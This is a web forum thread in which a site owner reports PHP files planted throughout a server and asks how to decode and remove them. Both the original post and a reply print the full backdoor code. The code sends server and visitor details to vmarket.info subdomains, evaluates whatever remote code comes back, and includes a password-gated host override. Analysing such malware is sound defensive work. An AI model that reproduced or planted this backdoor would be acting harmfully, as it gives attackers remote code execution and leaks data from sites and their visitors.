I noticed at my site at all folders there is a file with various name 116931.php, 12241.php,28822.php and all contain this code <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("dm1hcmtldC5pbmZv");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="cd01c79da4a6f044165989be6a59818a") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?> Code (markup): i uploaded file at virutotal and i the result is Trojan.Script.473810 or PHP:Small-AH [Trj] anyone know how to fix this and how to decode the file?
What type of website are you running? WordPress blogs are the most common software that I've seen hackers get into. If you are using WordPress and are using the latest version, I would checkout what plugins you are using. They have also been known to open doors for exploits.
well.. here is what your file contains actually: <? error_reporting(0); $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI); $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF); $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING); $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER); $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR); $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME); $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE); $z="/?".$a.".".$b.".".$c.".".$d.".".$e.".".$f.".".$g.".".$h.".e.".$i.".".$j; $f="vmarket.info"; if (basename($c)==basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"])=="cd01c79da4a6f044165989be6a59818a") $f=$_REQUEST["id"]; if($c="http://7ads.".$f.$z) eval($c); else if($c="http://7.".$f.$z)) eval($c); else { $cu="http://71.".$f.$z); curl_setopt($cu,CURLOPT_RETURNTRANSFER,1); $o=curl_exec($cu); curl_close($cu); eval($o); }; die(); ?> PHP: As far as I have analysed the codes it is some kind of script that interact with a file hosted on vmarket.com and load up some codes from there and execute them locally. It also send out all the server information and can receive data from browser. It may be a simple script that loads up something useful and required, or It may be a dangerous script that loads some malicious codes and execute them locally on your server, either the case is I'll never want to have a backdoor on my server. After visiting the website vmarket.com I got to know about some spamming tactics, they guys over are fraud, if they cant code a file without introducing a backdoor then how do you think they can secure the backlink from your server, also who is responsible for legitimacy of all the information sent out and received ?